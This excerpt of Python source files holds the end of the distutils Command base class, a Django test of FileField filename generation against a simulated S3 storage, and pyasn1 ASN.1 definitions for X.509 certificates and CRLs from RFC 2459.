setattr(self, dst_option, getattr(src_cmd_obj, src_option))
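    # Hedged usage sketch (illustrative option names, not taken from the
    # original source): a build-style command would typically inherit values
    # from the 'build' command like so:
    #
    #   def finalize_options(self):
    #       self.set_undefined_options('build',
    #                                  ('build_base', 'build_dir'),
    #                                  ('force', 'force'))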
def get_finalized_command(self, command, create=1):
"""Wrapper around Distribution's 'get_command_obj()' method: find
(create if necessary and 'create' is true) the command object for
'command', call its 'ensure_finalized()' method, and return the
finalized command object.
"""
cmd_obj = self.distribution.get_command_obj(command, create)
cmd_obj.ensure_finalized()
return cmd_obj
# XXX rename to 'get_reinitialized_command()'? (should do the
# same in dist.py, if so)
def reinitialize_command(self, command, reinit_subcommands=0):
return self.distribution.reinitialize_command(command,
reinit_subcommands)
def run_command(self, command):
"""Run some other command: uses the 'run_command()' method of
Distribution, which creates and finalizes the command object if
necessary and then invokes its 'run()' method.
"""
self.distribution.run_command(command)
def get_sub_commands(self):
"""Determine the sub-commands that are relevant in the current
distribution (ie., that need to be run). This is based on the
'sub_commands' class attribute: each tuple in that list may include
a method that we call to determine if the subcommand needs to be
run for the current distribution. Return a list of command names.
"""
commands = []
for (cmd_name, method) in self.sub_commands:
if method is None or method(self):
commands.append(cmd_name)
return commands
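    # Hedged illustration (hypothetical predicate): a parent command declares
    # something along the lines of
    #
    #   sub_commands = [('install_lib', lambda self: self.distribution.has_pure_modules()),
    #                   ('install_scripts', None)]
    #
    # and get_sub_commands() then keeps only the names whose predicate is None
    # or returns true for the current distribution.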
# -- External world manipulation -----------------------------------
def warn(self, msg):
log.warn("warning: %s: %s\n" %
(self.get_command_name(), msg))
def execute(self, func, args, msg=None, level=1):
util.execute(func, args, msg, dry_run=self.dry_run)
def mkpath(self, name, mode=0o777):
dir_util.mkpath(name, mode, dry_run=self.dry_run)
def copy_file(self, infile, outfile, preserve_mode=1, preserve_times=1,
link=None, level=1):
"""Copy a file respecting verbose, dry-run and force flags. (The
former two default to whatever is in the Distribution object, and
the latter defaults to false for commands that don't define it.)"""
return file_util.copy_file(infile, outfile, preserve_mode,
preserve_times, not self.force, link,
dry_run=self.dry_run)
def copy_tree(self, infile, outfile, preserve_mode=1, preserve_times=1,
preserve_symlinks=0, level=1):
"""Copy an entire directory tree respecting verbose, dry-run,
and force flags.
"""
return dir_util.copy_tree(infile, outfile, preserve_mode,
preserve_times, preserve_symlinks,
not self.force, dry_run=self.dry_run)
def move_file (self, src, dst, level=1):
"""Move a file respecting dry-run flag."""
return file_util.move_file(src, dst, dry_run=self.dry_run)
def spawn(self, cmd, search_path=1, level=1):
"""Spawn an external command respecting dry-run flag."""
from distutils.spawn import spawn
spawn(cmd, search_path, dry_run=self.dry_run)
def make_archive(self, base_name, format, root_dir=None, base_dir=None,
owner=None, group=None):
return archive_util.make_archive(base_name, format, root_dir, base_dir,
dry_run=self.dry_run,
owner=owner, group=group)
def make_file(self, infiles, outfile, func, args,
exec_msg=None, skip_msg=None, level=1):
"""Special case of 'execute()' for operations that process one or
more input files and generate one output file. Works just like
'execute()', except the operation is skipped and a different
message printed if 'outfile' already exists and is newer than all
        files listed in 'infiles'.  If the command defines 'self.force'
        and it is true, the command runs unconditionally, with no
        timestamp checks.
"""
if skip_msg is None:
skip_msg = "skipping %s (inputs unchanged)" % outfile
# Allow 'infiles' to be a single string
if isinstance(infiles, str):
infiles = (infiles,)
elif not isinstance(infiles, (list, tuple)):
raise TypeError(
"'infiles' must be a string, or a list or tuple of strings")
if exec_msg is None:
exec_msg = "generating %s from %s" % (outfile, ', '.join(infiles))
# If 'outfile' must be regenerated (either because it doesn't
# exist, is out-of-date, or the 'force' flag is true) then
# perform the action that presumably regenerates it
if self.force or dep_util.newer_group(infiles, outfile):
self.execute(func, args, exec_msg, level)
# Otherwise, print the "skip" message
else:
log.debug(skip_msg)
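    # Hedged example (hypothetical file names and callable) of the intended
    # make_file() usage:
    #
    #   self.make_file(['parser.y'], 'parser.py', run_yacc, ('parser.y', 'parser.py'),
    #                  exec_msg="generating parser.py from parser.y")
    #
    # run_yacc is only invoked when parser.py is missing or older than
    # parser.y (or when self.force is set).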
# XXX 'install_misc' class not currently used -- it was the base class for
# both 'install_scripts' and 'install_data', but they outgrew it. It might
# still be useful for 'install_headers', though, so I'm keeping it around
# for the time being.
class install_misc(Command):
"""Common base class for installing some files in a subdirectory.
Currently used by install_data and install_scripts.
"""
user_options = [('install-dir=', 'd', "directory to install the files to")]
def initialize_options (self):
self.install_dir = None
self.outfiles = []
def _install_dir_from(self, dirname):
self.set_undefined_options('install', (dirname, 'install_dir'))
def _copy_files(self, filelist):
self.outfiles = []
if not filelist:
return
self.mkpath(self.install_dir)
for f in filelist:
self.copy_file(f, self.install_dir)
self.outfiles.append(os.path.join(self.install_dir, f))
def get_outputs(self):
return self.outfiles
|
taaviteska/django
|
refs/heads/master
|
tests/file_storage/test_generate_filename.py
|
124
|
import os
from django.core.files.base import ContentFile
from django.core.files.storage import Storage
from django.db.models import FileField
from django.test import SimpleTestCase
class AWSS3Storage(Storage):
"""
Simulate an AWS S3 storage which uses Unix-like paths and allows any
characters in file names but where there aren't actual folders but just
keys.
"""
prefix = 'mys3folder/'
def _save(self, name, content):
"""
        This method is important for testing that Storage.save() doesn't
        replace '\' with '/' (FileSystemStorage.save() does that, not Storage).
"""
return name
def get_valid_name(self, name):
return name
def get_available_name(self, name, max_length=None):
return name
def generate_filename(self, filename):
"""
This is the method that's important to override when using S3 so that
os.path() isn't called, which would break S3 keys.
"""
return self.prefix + self.get_valid_name(filename)
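# A hedged illustration (hypothetical key) of the behaviour AWSS3Storage models:
#
#   storage = AWSS3Storage()
#   storage.generate_filename('weird\\key name.txt')
#   # -> 'mys3folder/weird\\key name.txt'  (no os.path normalization of the key)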
class GenerateFilenameStorageTests(SimpleTestCase):
def test_filefield_generate_filename(self):
f = FileField(upload_to='some/folder/')
self.assertEqual(
f.generate_filename(None, 'test with space.txt'),
os.path.normpath('some/folder/test_with_space.txt')
)
def test_filefield_generate_filename_with_upload_to(self):
def upload_to(instance, filename):
return 'some/folder/' + filename
f = FileField(upload_to=upload_to)
self.assertEqual(
f.generate_filename(None, 'test with space.txt'),
os.path.normpath('some/folder/test_with_space.txt')
)
def test_filefield_awss3_storage(self):
"""
Simulate a FileField with an S3 storage which uses keys rather than
folders and names. FileField and Storage shouldn't have any os.path()
calls that break the key.
"""
storage = AWSS3Storage()
folder = 'not/a/folder/'
f = FileField(upload_to=folder, storage=storage)
key = 'my-file-key\\with odd characters'
data = ContentFile('test')
expected_key = AWSS3Storage.prefix + folder + key
# Simulate call to f.save()
result_key = f.generate_filename(None, key)
self.assertEqual(result_key, expected_key)
result_key = storage.save(result_key, data)
self.assertEqual(result_key, expected_key)
# Repeat test with a callable.
def upload_to(instance, filename):
# Return a non-normalized path on purpose.
return folder + filename
f = FileField(upload_to=upload_to, storage=storage)
# Simulate call to f.save()
result_key = f.generate_filename(None, key)
self.assertEqual(result_key, expected_key)
result_key = storage.save(result_key, data)
self.assertEqual(result_key, expected_key)
|
nirzari18/Query-Analysis-Application-on-Google-App-Engine
|
refs/heads/master
|
lib/pyasn1_modules/rfc2459.py
|
59
|
#
# X.509 message syntax
#
# ASN.1 source from:
# http://www.trl.ibm.com/projects/xml/xss4j/data/asn1/grammars/x509.asn
# http://www.ietf.org/rfc/rfc2459.txt
#
# Sample captures from:
# http://wiki.wireshark.org/SampleCaptures/
#
from pyasn1.type import tag,namedtype,namedval,univ,constraint,char,useful
MAX = 64  # XXX arbitrary stand-in for the unbounded ASN.1 upper bound 'MAX'
#
# PKIX1Explicit88
#
# Upper Bounds
ub_name = univ.Integer(32768)
ub_common_name = univ.Integer(64)
ub_locality_name = univ.Integer(128)
ub_state_name = univ.Integer(128)
ub_organization_name = univ.Integer(64)
ub_organizational_unit_name = univ.Integer(64)
ub_title = univ.Integer(64)
ub_match = univ.Integer(128)
ub_emailaddress_length = univ.Integer(128)
ub_common_name_length = univ.Integer(64)
ub_country_name_alpha_length = univ.Integer(2)
ub_country_name_numeric_length = univ.Integer(3)
ub_domain_defined_attributes = univ.Integer(4)
ub_domain_defined_attribute_type_length = univ.Integer(8)
ub_domain_defined_attribute_value_length = univ.Integer(128)
ub_domain_name_length = univ.Integer(16)
ub_extension_attributes = univ.Integer(256)
ub_e163_4_number_length = univ.Integer(15)
ub_e163_4_sub_address_length = univ.Integer(40)
ub_generation_qualifier_length = univ.Integer(3)
ub_given_name_length = univ.Integer(16)
ub_initials_length = univ.Integer(5)
ub_integer_options = univ.Integer(256)
ub_numeric_user_id_length = univ.Integer(32)
ub_organization_name_length = univ.Integer(64)
ub_organizational_unit_name_length = univ.Integer(32)
ub_organizational_units = univ.Integer(4)
ub_pds_name_length = univ.Integer(16)
ub_pds_parameter_length = univ.Integer(30)
ub_pds_physical_address_lines = univ.Integer(6)
ub_postal_code_length = univ.Integer(16)
ub_surname_length = univ.Integer(40)
ub_terminal_id_length = univ.Integer(24)
ub_unformatted_address_length = univ.Integer(180)
ub_x121_address_length = univ.Integer(16)
class UniversalString(char.UniversalString): pass
class BMPString(char.BMPString): pass
class UTF8String(char.UTF8String): pass
id_pkix = univ.ObjectIdentifier('1.3.6.1.5.5.7')
id_pe = univ.ObjectIdentifier('1.3.6.1.5.5.7.1')
id_qt = univ.ObjectIdentifier('1.3.6.1.5.5.7.2')
id_kp = univ.ObjectIdentifier('1.3.6.1.5.5.7.3')
id_ad = univ.ObjectIdentifier('1.3.6.1.5.5.7.48')
id_qt_cps = univ.ObjectIdentifier('1.3.6.1.5.5.7.2.1')
id_qt_unotice = univ.ObjectIdentifier('1.3.6.1.5.5.7.2.2')
id_ad_ocsp = univ.ObjectIdentifier('1.3.6.1.5.5.7.48.1')
id_ad_caIssuers = univ.ObjectIdentifier('1.3.6.1.5.5.7.48.2')
class AttributeValue(univ.Any): pass
class AttributeType(univ.ObjectIdentifier): pass
class AttributeTypeAndValue(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('type', AttributeType()),
namedtype.NamedType('value', AttributeValue())
)
class Attribute(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('type', AttributeType()),
namedtype.NamedType('vals', univ.SetOf(componentType=AttributeValue()))
)
id_at = univ.ObjectIdentifier('2.5.4')
id_at_name = univ.ObjectIdentifier('2.5.4.41')
id_at_sutname = univ.ObjectIdentifier('2.5.4.4')
id_at_givenName = univ.ObjectIdentifier('2.5.4.42')
id_at_initials = univ.ObjectIdentifier('2.5.4.43')
id_at_generationQualifier = univ.ObjectIdentifier('2.5.4.44')
class X520name(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('teletexString', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_name))),
namedtype.NamedType('printableString', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_name))),
namedtype.NamedType('universalString', char.UniversalString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_name))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_name))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_name)))
)
id_at_commonName = univ.ObjectIdentifier('2.5.4.3')
class X520CommonName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('teletexString', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_common_name))),
namedtype.NamedType('printableString', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_common_name))),
namedtype.NamedType('universalString', char.UniversalString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_common_name))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_common_name))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_common_name)))
)
id_at_localityName = univ.ObjectIdentifier('2.5.4.7')
class X520LocalityName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('teletexString', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_locality_name))),
namedtype.NamedType('printableString', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_locality_name))),
namedtype.NamedType('universalString', char.UniversalString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_locality_name))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_locality_name))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_locality_name)))
)
id_at_stateOrProvinceName = univ.ObjectIdentifier('2.5.4.8')
class X520StateOrProvinceName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('teletexString', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_state_name))),
namedtype.NamedType('printableString', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_state_name))),
namedtype.NamedType('universalString', char.UniversalString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_state_name))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_state_name))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_state_name)))
)
id_at_organizationName = univ.ObjectIdentifier('2.5.4.10')
class X520OrganizationName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('teletexString', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organization_name))),
namedtype.NamedType('printableString', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organization_name))),
namedtype.NamedType('universalString', char.UniversalString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organization_name))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organization_name))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organization_name)))
)
id_at_organizationalUnitName = univ.ObjectIdentifier('2.5.4.11')
class X520OrganizationalUnitName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('teletexString', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organizational_unit_name))),
namedtype.NamedType('printableString', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organizational_unit_name))),
namedtype.NamedType('universalString', char.UniversalString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organizational_unit_name))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organizational_unit_name))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organizational_unit_name)))
)
id_at_title = univ.ObjectIdentifier('2.5.4.12')
class X520Title(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('teletexString', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_title))),
namedtype.NamedType('printableString', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_title))),
namedtype.NamedType('universalString', char.UniversalString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_title))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_title))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_title)))
)
id_at_dnQualifier = univ.ObjectIdentifier('2.5.4.46')
class X520dnQualifier(char.PrintableString): pass
id_at_countryName = univ.ObjectIdentifier('2.5.4.6')
class X520countryName(char.PrintableString):
subtypeSpec = char.PrintableString.subtypeSpec + constraint.ValueSizeConstraint(2, 2)
pkcs_9 = univ.ObjectIdentifier('1.2.840.113549.1.9')
emailAddress = univ.ObjectIdentifier('1.2.840.113549.1.9.1')
class Pkcs9email(char.IA5String):
subtypeSpec = char.IA5String.subtypeSpec + constraint.ValueSizeConstraint(1, ub_emailaddress_length)
# ----
class DSAPrivateKey(univ.Sequence):
"""PKIX compliant DSA private key structure"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', univ.Integer(namedValues=namedval.NamedValues(('v1', 0)))),
namedtype.NamedType('p', univ.Integer()),
namedtype.NamedType('q', univ.Integer()),
namedtype.NamedType('g', univ.Integer()),
namedtype.NamedType('public', univ.Integer()),
namedtype.NamedType('private', univ.Integer())
)
# ----
class RelativeDistinguishedName(univ.SetOf):
componentType = AttributeTypeAndValue()
class RDNSequence(univ.SequenceOf):
componentType = RelativeDistinguishedName()
class Name(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('', RDNSequence())
)
class DirectoryString(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('teletexString', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, MAX))),
namedtype.NamedType('printableString', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, MAX))),
namedtype.NamedType('universalString', char.UniversalString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, MAX))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, MAX))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, MAX))),
namedtype.NamedType('ia5String', char.IA5String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, MAX))) # hm, this should not be here!? XXX
)
# certificate and CRL specific structures begin here
class AlgorithmIdentifier(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('algorithm', univ.ObjectIdentifier()),
namedtype.OptionalNamedType('parameters', univ.Any())
)
class Extension(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('extnID', univ.ObjectIdentifier()),
namedtype.DefaultedNamedType('critical', univ.Boolean('False')),
namedtype.NamedType('extnValue', univ.Any())
)
class Extensions(univ.SequenceOf):
componentType = Extension()
sizeSpec = univ.SequenceOf.sizeSpec + constraint.ValueSizeConstraint(1, MAX)
class SubjectPublicKeyInfo(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('algorithm', AlgorithmIdentifier()),
namedtype.NamedType('subjectPublicKey', univ.BitString())
)
class UniqueIdentifier(univ.BitString): pass
class Time(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('utcTime', useful.UTCTime()),
namedtype.NamedType('generalTime', useful.GeneralizedTime())
)
class Validity(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('notBefore', Time()),
namedtype.NamedType('notAfter', Time())
)
class CertificateSerialNumber(univ.Integer): pass
class Version(univ.Integer):
namedValues = namedval.NamedValues(
('v1', 0), ('v2', 1), ('v3', 2)
)
class TBSCertificate(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.DefaultedNamedType('version', Version('v1').subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.NamedType('serialNumber', CertificateSerialNumber()),
namedtype.NamedType('signature', AlgorithmIdentifier()),
namedtype.NamedType('issuer', Name()),
namedtype.NamedType('validity', Validity()),
namedtype.NamedType('subject', Name()),
namedtype.NamedType('subjectPublicKeyInfo', SubjectPublicKeyInfo()),
namedtype.OptionalNamedType('issuerUniqueID', UniqueIdentifier().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.OptionalNamedType('subjectUniqueID', UniqueIdentifier().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))),
namedtype.OptionalNamedType('extensions', Extensions().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 3)))
)
class Certificate(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('tbsCertificate', TBSCertificate()),
namedtype.NamedType('signatureAlgorithm', AlgorithmIdentifier()),
namedtype.NamedType('signatureValue', univ.BitString())
)
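# Hedged usage sketch (not part of the original module): these specs are meant
# to be handed to pyasn1's DER codec, along the lines of
#
#   from pyasn1.codec.der import decoder
#   cert, rest = decoder.decode(der_bytes, asn1Spec=Certificate())
#   tbs = cert.getComponentByName('tbsCertificate')
#
# where 'der_bytes' is assumed to hold a DER-encoded X.509 certificate.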
# CRL structures
class RevokedCertificate(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('userCertificate', CertificateSerialNumber()),
namedtype.NamedType('revocationDate', Time()),
namedtype.OptionalNamedType('crlEntryExtensions', Extensions())
)
class TBSCertList(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('version', Version()),
namedtype.NamedType('signature', AlgorithmIdentifier()),
namedtype.NamedType('issuer', Name()),
namedtype.NamedType('thisUpdate', Time()),
namedtype.OptionalNamedType('nextUpdate', Time()),
namedtype.OptionalNamedType('revokedCertificates', univ.SequenceOf(componentType=RevokedCertificate())),
namedtype.OptionalNamedType('crlExtensions', Extensions().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)))
)
class CertificateList(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('tbsCertList', TBSCertList()),
namedtype.NamedType('signatureAlgorithm', AlgorithmIdentifier()),
namedtype.NamedType('signature', univ.BitString())
)
# Algorithm OIDs and parameter structures
pkcs_1 = univ.ObjectIdentifier('1.2.840.113549.1.1')
rsaEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.1')
md2WithRSAEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.2')
md5WithRSAEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.4')
sha1WithRSAEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.5')
id_dsa_with_sha1 = univ.ObjectIdentifier('1.2.840.10040.4.3')
class Dss_Sig_Value(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('r', univ.Integer()),
namedtype.NamedType('s', univ.Integer())
)
dhpublicnumber = univ.ObjectIdentifier('1.2.840.10046.2.1')
class ValidationParms(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('seed', univ.BitString()),
namedtype.NamedType('pgenCounter', univ.Integer())
)
class DomainParameters(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('p', univ.Integer()),
namedtype.NamedType('g', univ.Integer()),
namedtype.NamedType('q', univ.Integer()),
namedtype.NamedType('j', univ.Integer()),
namedtype.OptionalNamedType('validationParms', ValidationParms())
)
id_dsa = univ.ObjectIdentifier('1.2.840.10040.4.1')
class Dss_Parms(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('p', univ.Integer()),
namedtype.NamedType('q', univ.Integer()),
namedtype.NamedType('g', univ.Integer())
)
# x400 address syntax starts here
teletex_domain_defined_attributes = univ.Integer(6)
class TeletexDomainDefinedAttribute(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('type', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_domain_defined_attribute_type_length))),
namedtype.NamedType('value', char.TeletexString())
)
class TeletexDomainDefinedAttributes(univ.SequenceOf):
componentType = TeletexDomainDefinedAttribute()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, ub_domain_defined_attributes)
terminal_type = univ.Integer(23)
class TerminalType(univ.Integer):
subtypeSpec = univ.Integer.subtypeSpec + constraint.ValueSizeConstraint(0, ub_integer_options)
namedValues = namedval.NamedValues(
('telex', 3),
('teletelex', 4),
('g3-facsimile', 5),
('g4-facsimile', 6),
('ia5-terminal', 7),
('videotex', 8)
)
class PresentationAddress(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('pSelector', univ.OctetString().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('sSelector', univ.OctetString().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.OptionalNamedType('tSelector', univ.OctetString().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))),
namedtype.OptionalNamedType('nAddresses', univ.SetOf(componentType=univ.OctetString()).subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 3), subtypeSpec=constraint.ValueSizeConstraint(1, MAX))),
)
extended_network_address = univ.Integer(22)
class E163_4_address(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('number', char.NumericString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_e163_4_number_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('sub-address', char.NumericString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_e163_4_sub_address_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1)))
)
class ExtendedNetworkAddress(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('e163-4-address', E163_4_address()),
namedtype.NamedType('psap-address', PresentationAddress().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)))
)
class PDSParameter(univ.Set):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('printable-string', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_pds_parameter_length))),
namedtype.OptionalNamedType('teletex-string', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_pds_parameter_length)))
)
local_postal_attributes = univ.Integer(21)
class LocalPostalAttributes(PDSParameter): pass
class UniquePostalName(PDSParameter): pass
unique_postal_name = univ.Integer(20)
poste_restante_address = univ.Integer(19)
class PosteRestanteAddress(PDSParameter): pass
post_office_box_address = univ.Integer(18)
class PostOfficeBoxAddress(PDSParameter): pass
street_address = univ.Integer(17)
class StreetAddress(PDSParameter): pass
class UnformattedPostalAddress(univ.Set):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('printable-address', univ.SequenceOf(componentType=char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_pds_parameter_length)).subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_pds_physical_address_lines)))),
namedtype.OptionalNamedType('teletex-string', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_unformatted_address_length)))
)
physical_delivery_office_name = univ.Integer(10)
class PhysicalDeliveryOfficeName(PDSParameter): pass
physical_delivery_office_number = univ.Integer(11)
class PhysicalDeliveryOfficeNumber(PDSParameter): pass
extension_OR_address_components = univ.Integer(12)
class ExtensionORAddressComponents(PDSParameter): pass
physical_delivery_personal_name = univ.Integer(13)
class PhysicalDeliveryPersonalName(PDSParameter): pass
physical_delivery_organization_name = univ.Integer(14)
class PhysicalDeliveryOrganizationName(PDSParameter): pass
extension_physical_delivery_address_components = univ.Integer(15)
class ExtensionPhysicalDeliveryAddressComponents(PDSParameter): pass
unformatted_postal_address = univ.Integer(16)
postal_code = univ.Integer(9)
class PostalCode(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('numeric-code', char.NumericString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_postal_code_length))),
namedtype.NamedType('printable-code', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_postal_code_length)))
)
class PhysicalDeliveryCountryName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('x121-dcc-code', char.NumericString().subtype(subtypeSpec=constraint.ValueSizeConstraint(ub_country_name_numeric_length, ub_country_name_numeric_length))),
namedtype.NamedType('iso-3166-alpha2-code', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(ub_country_name_alpha_length, ub_country_name_alpha_length)))
)
class PDSName(char.PrintableString):
subtypeSpec = char.PrintableString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_pds_name_length)
physical_delivery_country_name = univ.Integer(8)
class TeletexOrganizationalUnitName(char.TeletexString):
subtypeSpec = char.TeletexString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_organizational_unit_name_length)
pds_name = univ.Integer(7)
teletex_organizational_unit_names = univ.Integer(5)
class TeletexOrganizationalUnitNames(univ.SequenceOf):
componentType = TeletexOrganizationalUnitName()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, ub_organizational_units)
teletex_personal_name = univ.Integer(4)
class TeletexPersonalName(univ.Set):
componentType = namedtype.NamedTypes(
namedtype.NamedType('surname', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_surname_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('given-name', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_given_name_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.OptionalNamedType('initials', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_initials_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))),
namedtype.OptionalNamedType('generation-qualifier', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_generation_qualifier_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 3)))
)
teletex_organization_name = univ.Integer(3)
class TeletexOrganizationName(char.TeletexString):
subtypeSpec = char.TeletexString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_organization_name_length)
teletex_common_name = univ.Integer(2)
